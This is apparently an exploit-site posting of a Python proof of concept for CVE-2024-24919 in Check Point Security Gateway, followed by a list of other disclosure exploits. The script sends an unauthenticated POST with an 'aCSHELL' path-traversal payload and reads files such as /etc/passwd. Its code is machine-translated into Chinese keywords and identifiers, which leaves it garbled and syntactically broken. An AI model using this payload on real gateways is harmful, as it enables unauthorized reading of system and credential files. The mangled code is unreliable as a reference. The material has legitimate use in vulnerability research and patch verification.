检查点安全网关- 信息披露（未经身份验证）

HackApt-37 Team · 04 9, 2025

＃利用标题:检查点安全网关- 信息披露（未经身份验证）
＃利用作者: Yesith Alvarez
＃供应商homepage3360 https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20 (EOL), R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
＃CVE : CVE-2024-24919
从请求导入请求，会话
导入系统
进口JSON
def title（）:
打印（''''
______________ __ __ __ __ __ __ __ __ __ __
/__ \ \ \//__ | | __ \/_ \ __ \ | || | __ \ | || || |/_ \/_ |/_ \
| | \ \//| | __ _______）| | | | | | ）| | | | _ _______）| || || || || （_）||
| | \ \//| __ | _______//| | | | | |///| __ _ | _______///| __ _ \ __，|| | \ __，|
| | _____ \/| | ____//_ | | _ |//_ | |///| |//| |///| |////
\ ______ | \/| _______ | | _____/__ | | ___ | | __ | | __ | | _ |//| _ | //
作者: Yesith Alvarez
github: https://github.com/yealvarez
LinkedIn: https://www.linkedin.com/in/pentester-ethicalhacker/
''））
DEF漏洞利用（URL，路径）:
url=url +'/clients/mycrl'
data='acshell /././././././././././././././././.'+路径
标题={
'Connection':'keep-alive'，
'用户代理:'Mozilla/5.0（Windows NT 10.0; Win64; X64; rv:123.0）Gecko/20100101 Firefox/123.0'
}
s=session（）
req=request（'post'，url，data=data，headers=标题）
准备=req.prepare（）
#del准备。
resp=s.send（准备，
验证=false，
超时=15
）
打印（预处理。
打印（URL）
印刷（指数）
打印（resp.status_code）
如果name=='__ -Main __':
标题（）
如果（len（sys.argv）3）:
print（'[+]用法: python3％s https://Target_url路径\ n'％（sys.argv [0]））
print（'[+]示例: python3％s https://192.168.0.0.10'/etc/passwd'oul'iss（sys.argv [0]）））
出口（0）
其他:
exploit（sys.argv [1]，sys.argv [2]）

H	Smart Office Web 20.28-远程信息披露（未经身份验证） HackApt-37 Team 04 9, 2025 POC/?Day
H	Openclinic GA 5.247.01-信息披露 HackApt-37 Team 04 9, 2025 POC/?Day
H	Geovision GV -Asmanager 6.1.0.0-信息披露 HackApt-37 Team 04 9, 2025 POC/?Day
H	djangorestframework -simplejwt 5.3.1-信息披露 HackApt-37 Team 04 9, 2025 POC/?Day
H	HNAS SMU 14.8.7825-信息披露 HackApt-37 Team 04 9, 2025 POC/?Day